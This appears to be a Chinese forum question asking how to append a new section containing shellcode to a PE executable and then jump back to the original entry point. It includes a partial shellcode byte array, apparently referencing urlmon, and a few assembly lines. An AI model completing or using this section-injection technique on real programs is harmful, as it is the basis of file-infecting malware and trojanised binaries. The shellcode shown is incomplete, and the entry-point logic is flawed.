添加一个新节,新节内容是弹出一个窗口,是一段shellcode类型的,怎么能当弹出窗口后在返回源程序,比如下面格式(shellcode不是完整的)
shellcode_bin = $
shelldata:
db 0EBh,54h,8Bh,75h,3Ch,8Bh,74h,35h,78h,03h,0F5h,56h,8Bh,76h,20h,03h,0F5h,33
db 41h,0ADh,33h,0DBh,36h,0Fh,0BEh,14h,28h,38h,0F2h,74h,08h,0C1h,0CBh,0Dh,0
db 0EFh,3Bh,0DFh,75h,0E7h,5Eh,8Bh,5Eh,24h,03h,0DDh,66h,8Bh,0Ch,4Bh,8Bh
db 8Bh,04h,8Bh,03h,0C5h,0C3h,75h,72h,6Ch,6Dh,6Fh,6Eh,2Eh,64h,6Ch,
shellcode_end = $
怎么编写当执行完shellcode就开始执行源程序呢?求指导,
mov eax,[ebx]. OptionalHeader.AddressOfEntryPoint ;入口地址
mov eax, [ebx].OptionalHeader.ImageBase ;基址
mov old_base,eax
原入口我保存在了old_base里面了
我想执行完shellcode就直接跳到原程序
[课程]Android-CTF解题方法汇总!